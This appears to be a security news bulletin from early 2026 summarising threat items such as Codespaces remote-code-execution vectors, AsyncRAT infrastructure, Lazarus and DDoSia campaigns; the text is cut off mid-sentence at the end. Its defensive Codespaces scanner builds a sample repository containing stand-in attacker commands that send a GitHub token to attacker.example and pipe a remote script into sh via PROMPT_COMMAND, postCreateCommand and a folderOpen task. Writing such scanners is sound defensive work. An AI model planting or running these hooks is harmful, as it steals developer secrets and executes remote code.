- What: A summary of multiple small security signals including Codespaces RCE, AsyncRAT C2, BYOVD abuse, and AI cloud intrusions.
- Impact: Developers, remote tools, cloud access, and user actions are being targeted with increasingly subtle entry methods.
ThreatsDay Bulletin: Codespaces RCE, AsyncRAT C2, BYOVD Abuse, AI Cloud Intrusions & 15+ Stories
Ravie Lakshmanan, Feb 05, 2026, Cybersecurity / Hacking News

This week didn't produce one big headline. It produced many small signals — the kind that quietly shape what attacks will look like next. Researchers tracked intrusions that start in ordinary places: developer workflows, remote tools, cloud access, identity paths, and even routine user actions. Nothing looked dramatic on the surface. That's the point. Entry is becoming less visible while impact scales later.

Several findings also show how attackers are industrializing their work — shared infrastructure, repeatable playbooks, rented access, and affiliate-style ecosystems. Operations are no longer isolated campaigns. They run more like services.

This edition pulls those fragments together — short, precise updates that show where techniques are maturing, where exposure is widening, and what patterns are forming behind the noise.

Startup espionage expansion
Operation Nomad Leopard Targets Afghanistan

In a sign that the threat actor has moved beyond government targets, the Pakistan-aligned APT36 threat actor (also tracked as Transparent Tribe) has been observed targeting India's startup ecosystem, using ISO files and malicious LNK shortcuts with startup-themed lures to deliver Crimson RAT, which enables comprehensive surveillance, data exfiltration, and system reconnaissance. The initial access vector is a spear-phishing email carrying an ISO image. Once mounted, the ISO contains a malicious shortcut file and a folder holding three files: a decoy document, a batch script that acts as the persistence mechanism, and the final Crimson RAT payload, disguised as an executable named Excel.
"Despite this expansion, the campaign remains closely aligned with Transparent Tribe's historical focus on Indian government and defense-adjacent intelligence collection, with overlap suggesting that startup-linked individuals may be targeted for their proximity to government, law enforcement, or security operations," Acronis said.

Shared cybercrime infrastructure
ShadowSyndicate Levels Up with New Tactics

The threat activity cluster known as ShadowSyndicate has been linked to two additional SSH markers that connect dozens of servers to the same cybercrime operator. These hosts are then used for a wide range of malicious activities by various threat clusters linked to Cl0p, BlackCat, Ryuk, Malsmoke, and Black Basta. A notable finding is that the threat actor tends to transfer servers between its SSH clusters. ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel.

"The threat actor tends to reuse previously employed infrastructure, sometimes rotating various SSH keys across their servers," Group-IB said. "If such a technique is performed correctly, the infrastructure is transferred subsequently, much like in a legitimate scenario, when a server goes to a new user."

Ransomware KEV expansion
CISA Marks 59 CVEs as Exploited in Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) updated 59 entries in its Known Exploited Vulnerabilities (KEV) catalog during 2025 to reflect their use by ransomware groups. That list includes 16 entries for Microsoft, six for Ivanti, five for Fortinet, three for Palo Alto Networks, and three for Zimbra.

"When it flips from 'Unknown' to 'Known,' reassess, especially if you've been deprioritizing that patch because 'it's not ransomware-related yet,'" GreyNoise's Glenn Thorpe said.
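Acting on Thorpe's advice requires noticing when an entry's flag changes, which the catalog itself does not announce. The script below is an added example for this bulletin, not code from CISA or GreyNoise: it diffs two saved copies of the KEV JSON feed and lists entries whose knownRansomwareCampaignUse field (the catalog's own field name) changed to "Known". The snapshots embedded here are constructed, with placeholder CVE IDs and vendor names that do not correspond to real vulnerabilities; on a real run you would load two dated downloads of the feed with load_snapshot.

```python
"""Diff two saved copies of the CISA KEV catalog and list entries whose
knownRansomwareCampaignUse flag changed to "Known"."""
import json
from collections import Counter
from pathlib import Path

# Live feed; save dated copies of it to diff. Not fetched here so the example runs offline.
KEV_FEED_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"


def index_entries(feed: dict) -> dict:
    """Map cveID -> entry for one catalog snapshot (the feed's top-level shape)."""
    return {v["cveID"]: v for v in feed["vulnerabilities"]}


def load_snapshot(path) -> dict:
    """Load a saved KEV JSON file from disk and index it by CVE ID."""
    return index_entries(json.loads(Path(path).read_text(encoding="utf-8")))


def ransomware_flips(old: dict, new: dict) -> list[dict]:
    """Entries marked Known in `new` that were Unknown (or absent) in `old`."""
    flips = []
    for cve, entry in new.items():
        if entry.get("knownRansomwareCampaignUse") != "Known":
            continue
        prev = old.get(cve)
        if prev is None or prev.get("knownRansomwareCampaignUse") != "Known":
            flips.append(entry)
    return sorted(flips, key=lambda e: (e["vendorProject"], e["cveID"]))


def count_by_vendor(entries) -> Counter:
    """Per-vendor tally, the same breakdown the bulletin gives for the 59 entries."""
    return Counter(e["vendorProject"] for e in entries)


# Constructed snapshots with placeholder IDs and vendors (not real CVEs), so this runs offline.
def _entry(cve, vendor, product, flag):
    return {"cveID": cve, "vendorProject": vendor, "product": product,
            "knownRansomwareCampaignUse": flag}


OLD_FEED = {"catalogVersion": "2025.01.01", "vulnerabilities": [
    _entry("CVE-0000-0001", "ExampleVendor", "Gateway", "Unknown"),
    _entry("CVE-0000-0002", "ExampleVendor", "Mail", "Known"),
    _entry("CVE-0000-0003", "OtherVendor", "VPN", "Unknown"),
]}
NEW_FEED = {"catalogVersion": "2025.12.31", "vulnerabilities": [
    _entry("CVE-0000-0001", "ExampleVendor", "Gateway", "Known"),   # flipped Unknown -> Known
    _entry("CVE-0000-0002", "ExampleVendor", "Mail", "Known"),      # unchanged
    _entry("CVE-0000-0003", "OtherVendor", "VPN", "Unknown"),       # still Unknown
    _entry("CVE-0000-0004", "OtherVendor", "Firewall", "Known"),    # new entry, already Known
]}

if __name__ == "__main__":
    flips = ransomware_flips(index_entries(OLD_FEED), index_entries(NEW_FEED))
    for e in flips:
        print(f"{e['cveID']}  {e['vendorProject']} {e['product']}  -> reprioritize")
    print(dict(count_by_vendor(flips)))
```

Entries that first appear already marked "Known" are reported as well, because a deprioritized patch can be missed either way; if you only want the literal Unknown-to-Known transitions, drop the `prev is None` branch.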
Espionage and DDoS arrests
Polish Authorities Detain Two People

Polish authorities have detained a 60-year-old employee of the country's defense ministry on suspicion of spying for a foreign intelligence agency. The suspect worked in the Ministry of National Defense's strategy and planning department, including on military modernization projects, officials said. While the name of the country was not revealed, Polish state officials told local media that the suspect had worked with Russian and Belarusian intelligence services. In a related development, Poland's Central Bureau for Combating Cybercrime (CBZC) said a 20-year-old man has been arrested for allegedly conducting distributed denial-of-service (DDoS) attacks on high-profile websites, including those of strategic importance. The individual faces six charges and a potential five-year prison sentence.

Codespaces RCE vectors
Supply-Chain Attack Vectors in GitHub Codespaces

Multiple attack vectors have been disclosed in GitHub Codespaces that allow remote code execution simply by opening a malicious repository or pull request. The identified vectors include: (1) .vscode/settings.json with PROMPT_COMMAND injection, (2) .devcontainer/devcontainer.json with postCreateCommand injection, and (3) .vscode/tasks.json with folderOpen auto-run tasks. "By abusing VSCode-integrated configuration files that Codespaces automatically respects, an adversary can execute arbitrary commands, exfiltrate GitHub tokens and secrets, and even abuse hidden APIs to access premium Copilot models," Orca Security researcher Roi Nisimi said. Microsoft has deemed the behavior to be by design.

Nordic finance targeting
Lazarus Group Linked to New Campaign Targeting the Nordics

The financial sector in the Nordics has been targeted by the North Korea-linked Lazarus Group as part of a long-running campaign dubbed Contagious Interview that drops a stealer and downloader named BeaverTail.
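Returning to the GitHub Codespaces item above: since Microsoft treats the behavior as by design, the practical control is to inspect a repository's editor and dev container configuration before opening it in a Codespace, because opening it is the trigger. The scanner below is an added example written for this bulletin, not Orca Security's tooling or anything from GitHub. It checks the three files named in the report for the keys involved: terminal.integrated.env.* entries in .vscode/settings.json that set PROMPT_COMMAND, tasks in .vscode/tasks.json with runOptions.runOn set to folderOpen, and lifecycle commands in devcontainer.json, of which the report names postCreateCommand. The other lifecycle hooks come from the Dev Container specification, and BASH_ENV and ENV are added on the assumption that any shell-executed variable matters the same way; both extensions are this example's, not the report's. It runs against a constructed sample repository written to a temporary directory, with a made-up attacker.example domain.

```python
"""Scan a repository checkout for VS Code / Dev Container settings that execute
commands automatically when the folder is opened or a Codespace is built."""
import json
import tempfile
from pathlib import Path

# Dev Container lifecycle hooks (devcontainer.json spec); the report names postCreateCommand.
DEVCONTAINER_HOOKS = ("initializeCommand", "onCreateCommand", "updateContentCommand",
                      "postCreateCommand", "postStartCommand", "postAttachCommand")
# Environment variables whose value the shell executes. PROMPT_COMMAND is the one
# from the report; BASH_ENV and ENV are added here as an assumption of this example.
SHELL_HOOK_VARS = ("PROMPT_COMMAND", "BASH_ENV", "ENV")


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside string literals (VS Code reads JSON-with-comments).
    Trailing commas, which JSONC also allows, are not handled here."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped character, e.g. \"
                i += 1
                out.append(text[i])
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):
            nl = text.find("\n", i)
            i = n if nl < 0 else nl           # resume at the newline itself
            continue
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = n if end < 0 else end + 2
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def load_jsonc(path: Path):
    """Parse a JSONC file, returning None when it is missing or unparseable."""
    try:
        return json.loads(strip_jsonc(path.read_text(encoding="utf-8")))
    except (OSError, ValueError):
        return None


def scan_repo(root) -> list[tuple[str, str]]:
    """Return (relative file, finding) pairs for every auto-executing hook found."""
    root = Path(root)
    findings = []
    settings = load_jsonc(root / ".vscode" / "settings.json")
    if isinstance(settings, dict):
        for key, val in settings.items():
            if key.startswith("terminal.integrated.env.") and isinstance(val, dict):
                for var in SHELL_HOOK_VARS:
                    if var in val:
                        findings.append((".vscode/settings.json", f"{key} sets {var}={val[var]!r}"))
    tasks = load_jsonc(root / ".vscode" / "tasks.json")
    if isinstance(tasks, dict):
        for task in tasks.get("tasks", []):
            run_on = (task.get("runOptions") or {}).get("runOn") if isinstance(task, dict) else None
            if run_on == "folderOpen":
                findings.append((".vscode/tasks.json",
                                 f"task {task.get('label')!r} runs on folderOpen: {task.get('command')!r}"))
    for rel in (".devcontainer/devcontainer.json", ".devcontainer.json"):
        conf = load_jsonc(root / rel)
        if isinstance(conf, dict):
            for hook in DEVCONTAINER_HOOKS:
                if hook in conf:
                    findings.append((rel, f"{hook}: {conf[hook]!r}"))
    return findings


def build_sample_repo() -> str:
    """Write constructed (not real) malicious config files to a temp dir; returns its path."""
    root = Path(tempfile.mkdtemp())
    (root / ".vscode").mkdir()
    (root / ".devcontainer").mkdir()
    (root / ".vscode" / "settings.json").write_text(
        '{\n  // editor defaults\n  "editor.tabSize": 2,\n'
        '  "terminal.integrated.env.linux": {"PROMPT_COMMAND": '
        '"curl -s -d \\"$GITHUB_TOKEN\\" https://attacker.example/c"}\n}\n')
    (root / ".vscode" / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{"label": "bootstrap", "type": "shell", "command": "sh .vscode/setup.sh",
                   "runOptions": {"runOn": "folderOpen"}}]}))
    (root / ".devcontainer" / "devcontainer.json").write_text(json.dumps({
        "image": "mcr.microsoft.com/devcontainers/base:ubuntu",
        "postCreateCommand": "curl -s https://attacker.example/s | sh"}))
    return str(root)


if __name__ == "__main__":
    for path, finding in scan_repo(build_sample_repo()):
        print(f"{path}: {finding}")
```

Run it from a plain clone on a host that has not opened the repository in an editor; a Codespace or VS Code window is the wrong place, since the hooks fire on open. The scanner deliberately does not evaluate Dockerfiles, dev container features, or devcontainer.json files placed in subfolders of .devcontainer, all of which can also run code at build time and deserve the same review.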
TRUESEC said of the malware: "BeaverTail contains functionality that will automatically search the victim's machine for cryptocurrency-related data, but can also be used as a remote access tool for further attacks."

Volunteer DDoS force
NoName057(16) and DDoSia Project Detailed

In a new analysis, SOCRadar said the pro-Russian hacktivist outfit known as NoName057(16) is using a volunteer-distributed DDoS weapon called DDoSia Project to disrupt government, media, and institutional websites tied to Ukraine and Western political interests. Through active Telegram channels with over 20,000 followers, the group frames the disruptive (but non-destructive) attacks as "self-defense" against Western aggression and provides real-time evidence of successful disruptions. Its ideologically driven campaigns often coincide with major geopolitical events, countering sanctions and military aid announcements with retaliatory cyber attacks.

"Unlike traditional botnets that compromise systems without user knowledge, DDoSia operates on a disturbing premise: thousands of willing participants knowingly install the tool and coordinate attacks against targets designated by the group's operators," SOCRadar said. "Through propaganda, gamification, and cryptocurrency rewards, NoName057(16) has built a distributed attack force that requires minimal technical skill to join, yet demonstrates remarkable operational sophistication."

According to Censys, targeting by the purpose-built tool is heavily focused on Ukraine, European allies, and NATO states, in the government, military, transportation, public utilities, financial, and tourism sectors.

Affiliate crypto drainers
Rublevka Team, a Russian Crypto Drainer Operation

A major cybercriminal operation dubbed Rublevka Team has specialized in large-scale cryptocurrency theft since its inception in 2023, generating over $10 million through affiliate-driven wallet-draining campaigns.
"Rublevka Team is an example of a 'traffer team,' composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages," Recorded Future said. "Unlike traditional malware-based approaches such as those used by the trafficker teams Markopolo and Crazy Evil, Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions."

Rublevka Team offers affiliates access to fully automated Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. This further lowers the technical barrier to entry, allowing the threat actors to build an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight. Rublevka Team's primary Telegram channel has approximately 7,000 members to date.

TLS deprecation deadline
Microsoft Urges Migration to TLS 1.2 for Azure Blob Storage

Microsoft is urging customers to secure their infrastructure with Transport Layer Security (TLS) version 1.2 for Azure Blob Storage and to remove dependencies on TLS versions 1.0 and 1.1. "On February 3, 2026, Azure Blob Storage will stop supporting versions 1.0 and 1.1 of Transport Layer Security (TLS)," Microsoft said. "TLS 1.2 will become the new minimum TLS version. This change impacts all existing and new blob storage accounts, using TLS 1.0 and 1.1 in all clouds. Storage accounts already using TLS 1.2 aren't impacted by this change."

Voicemail social engineering
German-Language Voicemail Lure Leads to Remote Access

In a new campaign, fake voicemail notifications hosted on bank-themed subdomains have been found to direct targets to a convincing "listen to your message" experience that's designed to look routine and trustworthy.
In reality, the attack leads to the deployment of Remotely RMM, legitimate remote access software, which enrolls the victim system into an attacker-controlled environment to enable persistent remote access and management. "The flow relies on social engineering rather than exploits, using lures to persuade users to approve installation steps," Censys said. "The end goal is installation of an RMM (remote monitoring and management) tool, enrolling the device into an attacker-controlled environment."

Global proxy botnet
SystemBC Botnet Has Over 10K Infected IPs

A long-running malware operation known as SystemBC (aka Coroxy or DroxiDat) has been tied to more than 10,000 infected IP addre